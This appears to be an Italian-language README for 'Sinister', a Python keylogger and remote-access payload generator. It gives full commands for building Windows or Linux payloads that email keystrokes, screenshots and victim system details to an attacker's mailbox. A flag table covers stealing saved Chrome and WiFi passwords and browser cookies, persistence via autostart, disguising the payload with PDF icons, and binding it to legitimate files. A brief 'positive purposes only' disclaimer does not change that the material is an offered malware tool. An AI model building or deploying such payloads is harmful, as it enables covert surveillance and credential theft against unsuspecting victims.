
Sinister è un generatore di keylogger per Windows/Linux che invia i tasti premuti via email insieme ad altre interessanti informazioni sul target.
Questo piccolo script Python può fare un lavoro davvero eccezionale.
Sinister è un generatore di Keylogger per Windows/Linux, che invia key-log e screenshot tramite email insieme ad altre preziose informazioni sul bersaglio, scritto in Python 3.
:computer: Questo progetto è stato creato solo per scopi positivi e uso personale.
QUESTO SOFTWARE VIENE FORNITO "COSÌ COM'È" SENZA ALCUNA GARANZIA. PUOI UTILIZZARLO A TUO RISCHIO. L'UTILIZZO È SOTTO LA COMPLETA RESPONSABILITÀ DELL'UTENTE FINALE. GLI SVILUPPATORI NON SI ASSUMONO ALCUNA RESPONSABILITÀ E NON SONO RESPONSABILI PER QUALSIASI USO IMPROPRIO O DANNO CAUSATO DA QUESTO PROGRAMMA.
| Nome Server | Server SMTP | Porta SMTP |
|---|---|---|
| GMAIL | smtp.gmail.com | 587 |
| OUTLOOK | smtp-mail.outlook.com | 587 |
| YAHOO | smtp.mail.yahoo.com | 587 |
| Cosa può rubare lo Stealer integrato : |
|---|
| Chrome (Password salvate) |
| WiFi (Password salvate) |
| Cookie di Chrome (Login Data, Cookie, Cronologia) |
| Cookie di Firefox (cookies.sqlite) |
| Queste informazioni sono recuperate e inviate: |
|---|
| Sistema Operativo |
| Nome del Computer |
| Nome Utente |
| IPv4 Pubblico |
Il 30 maggio 2022, Google ha rimosso la funzionalità delle app meno sicure, quindi invece della password di Gmail:
password specifica per l'app durante la creazione del payload.# Naviga nella directory /opt (opzionale)
$ cd /opt/
# Clona questo repository
$ git clone https://github.com/PushpenderIndia/Sinister.git
# Vai nella cartella Sinister
$ cd Sinister
# Installa le dipendenze
$ bash installer_linux.sh
*** Nota: Quando appare la finestra di dialogo dell'installer Python durante l'esecuzione di installer_linux.sh ***
* Clicca su installazione personalizzata
* Seleziona Percorso : C:/Python37-32
### In questo modo Python verrà installato in questo percorso (all'interno di Wine) : ~/.wine/drive_c/Python37-32
# Se ricevi errori durante l'esecuzione di installer_linux.sh, prova installare con installer_linux.py
$ python3 installer_linux.py
$ chmod +x Sinister.py
$ python3 Sinister.py --help
# Creazione del payload/RAT
$ python3 Sinister.py -e [email protected] -p PasswordEmail -l -o nome_file_output --icon percorso_icona
# Creazione del payload utilizzando server SMTP GMAIL, configurazione porta (Default SMTP Server = smtp.gmail.com, Default SMTP Port = 587)
$ python3 Sinister.py -e [email protected] -p PasswordEmail -l -o nome_file_output --icon percorso_icona
# Creazione del payload utilizzando server SMTP OUTLOOK, configurazione porta
$ python3 Sinister.py -e [email protected] -p PasswordEmail -x smtp-mail.outlook.com -y 587 -l -o nome_file_output --icon percorso_icona
# Creazione del payload utilizzando server SMTP YAHOO, configurazione porta
$ python3 Sinister.py -e [email protected] -p PasswordEmail -x smtp.mail.yahoo.com -y 587 -l -o nome_file_output --icon percorso_icona
Nota: Puoi anche usare le nostre icone personalizzate dalla cartella icon, usale così --icon icon/pdf.ico
# Installa le dipendenze
$ Installa l'ultima versione di Python 3.x
# Clona questo repository
$ git clone https://github.com/PushpenderIndia/Sinister.git
# Entra nel repository
$ cd Sinister
# Installa le dipendenze
$ python -m pip install -r requirements.txt
# Apri Sinister.py in un editor di testo e configura la riga 16 WINDOWS_PYTHON_PYINSTALLER_PATH = "C:/Python37-32/Scripts/pyinstaller.exe"
# Menu di aiuto
$ python Sinister.py --help
# Creazione del payload/RAT
$ python Sinister.py -e [email protected] -p PasswordEmail -w -o nome_file_output --icon percorso_icona
# Creazione del payload utilizzando server SMTP GMAIL, configurazione porta (Default SMTP Server = smtp.gmail.com, Default SMTP Port = 587)
$ python Sinister.py -e [email protected] -p PasswordEmail-w -o nome_file_output --icon percorso_icona
# Creazione del payload utilizzando server SMTP OUTLOOK, configurazione porta
$ python Sinister.py -e [email protected] -p PasswordEmail -x smtp-mail.outlook.com -y 587 -w -o nome_file_output --icon percorso_icona
# Creazione del payload utilizzando server SMTP YAHOO, configurazione porta
$ python Sinister.py -e [email protected] -p PasswordEmail -x smtp.mail.yahoo.com -y 587 -w -o nome_file_output --icon percorso_icona
Nota: Puoi anche usare le nostre icone personalizzate dalla cartella icon, usale così --icon icon/pdf.ico
















Prova a eseguire il Keylogger Offline per testare la cattura dei keylog offline e debug del keylogger eseguendo questi comandi:
Esegui test_key.py in entrambe le modalità [Compilato & Raw] e scopri qual è l'errore
Eseguilo così: python test_key.py
Compilalo anche così:
pyinstaller --onefile test_key.py --hidden-import=win32event --hidden-import=winerror --hidden-import=win32api --hidden-import=pynput.keyboard
Dopo l'esecuzione, inizia a digitare qualcosa, Il risultato verrà visualizzato nel prompt dei comandi ogni 10 secondi
I file del keylogger offline sono presenti nella cartella TestKeylogger
1. Crea un nuovo payload con il flag --debug
2. Esegui l'exe del payload tramite cmd [Non eseguire il payload facendo doppio clic]
3. Ora mostrerà un errore più appropriato in CMD, segnalalo nella sezione Issue
Apri il file Autostart con un editor di testo, Percorso file Autostart: ~/.config/autostart/xinput.desktop
Rimuovi queste 5 righe:
[Desktop Entry]
Type=Application
X-GNOME-Autostart-enabled=true
Name=Xinput
Exec="nome_file_destinazione"
Nota: nome_file_destinazione è il nome del file malevolo che hai dato al tuo Keylogger usando il parametro -o
Riavvia il sistema e poi elimina il file malevolo salvato nel percorso qui sotto
Percorso di destinazione, dove è salvato il Keylogger : ~/.config/xnput
Contributi di qualsiasi tipo sono benvenuti!
NOTA: Se dovresti essere nella lista dei contributori ma ti abbiamo dimenticato, faccelo sapere!
| Abbreviazione | Completo | Descrizione |
|---|
| -h | --help | mostra questo messaggio di aiuto ed esci |
| -i INTERVAL | --interval INTERVAL | Tempo tra i report in secondi. default=120 |
| -t TIME_PERSISTENT | --persistence TIME_PERSISTENT | Diventa persistente dopo __ secondi. default=10 |
| -x SMTP_Server | --smtp | Server SMTP personalizzato . default="smtp.gmail.com" |
| -y SMTP_Port | --port | Porta SMTP personalizzata . default=587 |
| -w | --windows | Genera un eseguibile Windows. |
| -l | --linux | Genera un eseguibile Linux. |
| -s | --steal-password | Ruba le password salvate dalla macchina vittima [OS Supportato : Windows] |
| -b file.txt | --bind PERCORSO_FILE_LEGITTIMO.pdf | AutoBinder : Specifica il percorso del file legittimo. [OS Supportato : Windows] |
| -d | --debug | Il payload verrà eseguito in primo piano con finestra CMD, per ottenere l'errore di esecuzione appropriato |
| Abbreviazione | Completo | Descrizione |
|---|
| --icon ICON | Specifica il percorso dell'icona, icona del file malevolo [Nota : Deve essere .ico] | |
| -e EMAIL | --email EMAIL | Indirizzo email a cui inviare i report. |
| -p PASSWORD | --password PASSWORD | Password per l'indirizzo email specificato nell'argomento -e. |
| -o OUT | --out OUT | Nome del file di output. |
![]() Pushpender Singh :computer: |
![]() Thomas Kunwar :computer: |
![]() krasnova19 :computer: |
![]() sarchish5 :computer: |
![]() chiragcode11 :computer: |
![]() C4RR0T02 :computer: |